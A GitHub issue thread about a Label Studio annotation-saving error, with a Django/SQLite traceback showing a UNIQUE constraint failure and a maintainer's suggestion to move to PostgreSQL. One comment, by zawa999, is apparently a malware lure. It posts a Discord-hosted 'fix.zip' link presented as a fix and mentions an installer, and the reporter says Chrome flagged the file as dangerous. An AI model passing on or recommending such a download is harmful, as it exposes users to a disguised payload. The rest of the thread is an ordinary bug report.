### ISSUE TITLE
there was an error saving your annotation

### ISSUE THREAD

**Issue by whatseob** [heartexlabs/label-studio#6295]
**Describe the bug**

label-studio shows : there was an error saving your annotation
but, annotation was already saved. and we cant update this file.

**To Reproduce**

Occurs randomly while using labeling

**Expected behavior**

**Screenshots**

![2024-09-02 15_24_51 627](https://github.com/user-attachments/assets/862fe297-4234-4614-bfe5-f9aa60a24396)

**Environment (please complete the following information):**
 - OS: ubuntu
 - Label Studio Version 1.13.1

**Additional context**

[2024-09-03 05:01:18,272] [core.utils.common::custom_exception_handler::91] [ERROR] 53b90566-02f0-4f73-9422-9f3c886a4600 Annotation with this unique id already exists
Traceback (most recent call last):
  File "/home/oms/label_server/env_test/lib/python3.8/site-packages/django/db/backends/utils.py", line 84, in _execute
    return self.cursor.execute(sql, params)
  File "/home/oms/label_server/env_test/lib/python3.8/site-packages/django/db/backends/sqlite3/base.py", line 423, in execute
    return Database.Cursor.execute(self, query, params)
sqlite3.IntegrityError: UNIQUE constraint failed: task_completion.unique_id

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "/home/oms/label_server/env_test/lib/python3.8/site-packages/label_studio/tasks/serializers.py", line 97, in create
    return super().create(*args, **kwargs)
  File "/home/oms/label_server/env_test/lib/python3.8/site-packages/rest_framework/serializers.py", line 962, in create
    instance = ModelClass._default_manager.create(**validated_data)
  File "/home/oms/label_server/env_test/lib/python3.8/site-packages/django/db/models/manager.py", line 85, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
  File "/home/oms/label_server/env_test/lib/python3.8/site-packages/django/db/models/query.py", line 453, in create
    obj.save(force_insert=True, using=self.db)
  File "/home/oms/label_server/env_test/lib/python3.8/site-packages/label_studio/tasks/models.py", line 731, in save
    result = super().save(*args, **kwargs)
  File "/home/oms/label_server/env_test/lib/python3.8/site-packages/django/db/models/base.py", line 739, in save
    self.save_base(using=using, force_insert=force_insert,
  File "/home/oms/label_server/env_test/lib/python3.8/site-packages/django/db/models/base.py", line 776, in save_base
    updated = self._save_table(
  File "/home/oms/label_server/env_test/lib/python3.8/site-packages/django/db/models/base.py", line 881, in _save_table
    results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
  File "/home/oms/label_server/env_test/lib/python3.8/site-packages/django/db/models/base.py", line 919, in _do_insert
    return manager._insert(
  File "/home/oms/label_server/env_test/lib/python3.8/site-packages/django/db/models/manager.py", line 85, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
  File "/home/oms/label_server/env_test/lib/python3.8/site-packages/django/db/models/query.py", line 1270, in _insert
    return query.get_compiler(using=using).execute_sql(returning_fields)
  File "/home/oms/label_server/env_test/lib/python3.8/site-packages/django/db/models/sql/compiler.py", line 1416, in execute_sql
    cursor.execute(sql, params)
  File "/home/oms/label_server/env_test/lib/python3.8/site-packages/sentry_sdk/utils.py", line 1730, in runner
    return sentry_patched_function(*args, **kwargs)
  File "/home/oms/label_server/env_test/lib/python3.8/site-packages/sentry_sdk/integrations/django/__init__.py", line 651, in execute
    result = real_execute(self, sql, params)
  File "/home/oms/label_server/env_test/lib/python3.8/site-packages/django/db/backends/utils.py", line 66, in execute
    return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
  File "/home/oms/label_server/env_test/lib/python3.8/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
    return executor(sql, params, many, context)
  File "/home/oms/label_server/env_test/lib/python3.8/site-packages/django/db/backends/utils.py", line 84, in _execute
    return self.cursor.execute(sql, params)
  File "/home/oms/label_server/env_test/lib/python3.8/site-packages/django/db/utils.py", line 90, in __exit__
    raise dj_exc_value.with_traceback(traceback) from exc_value
  File "/home/oms/label_server/env_test/lib/python3.8/site-packages/django/db/backends/utils.py", line 84, in _execute
    return self.cursor.execute(sql, params)
  File "/home/oms/label_server/env_test/lib/python3.8/site-packages/django/db/backends/sqlite3/base.py", line 423, in execute
    return Database.Cursor.execute(self, query, params)
django.db.utils.IntegrityError: UNIQUE constraint failed: task_completion.unique_id

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/oms/label_server/env_test/lib/python3.8/site-packages/rest_framework/views.py", line 506, in dispatch
    response = handler(request, *args, **kwargs)
  File "/home/oms/label_server/env_test/lib/python3.8/site-packages/django/utils/decorators.py", line 43, in _wrapper
    return bound_method(*args, **kwargs)
  File "/home/oms/label_server/env_test/lib/python3.8/site-packages/label_studio/webhooks/utils.py", line 162, in wrap
    response = func(self, request, *args, **kwargs)
  File "/home/oms/label_server/env_test/lib/python3.8/site-packages/label_studio/tasks/api.py", line 524, in post
    return super(AnnotationsListAPI, self).post(request, *args, **kwargs)
  File "/home/oms/label_server/env_test/lib/python3.8/site-packages/rest_framework/generics.py", line 242, in post
    return self.create(request, *args, **kwargs)
  File "/home/oms/label_server/env_test/lib/python3.8/site-packages/rest_framework/mixins.py", line 19, in create
    self.perform_create(serializer)
  File "/home/oms/label_server/env_test/lib/python3.8/site-packages/label_studio/tasks/api.py", line 584, in perform_create
    annotation = ser.save(**extra_args)
  File "/home/oms/label_server/env_test/lib/python3.8/site-packages/rest_framework/serializers.py", line 212, in save
    self.instance = self.create(validated_data)
  File "/home/oms/label_server/env_test/lib/python3.8/site-packages/label_studio/tasks/serializers.py", line 104, in create
    raise AnnotationDuplicateError()
tasks.exceptions.AnnotationDuplicateError: Annotation with this unique id already exists

**Comment by zawa999** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by whatseob** [comment]
> try this https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538& select the desired compiler in the installer

thanks, but chrome said it's dangerous file

**Comment by makseq** [comment]
You will have to switch to postgresdb, it looks like sqlite doesn't quite suit your needs and loading.

**Comment by whatseob** [comment]
Thanks for comment!
I searched to swich.. but i'm so worried about swith sqlite to postgresdb ...
how can i swich it..?
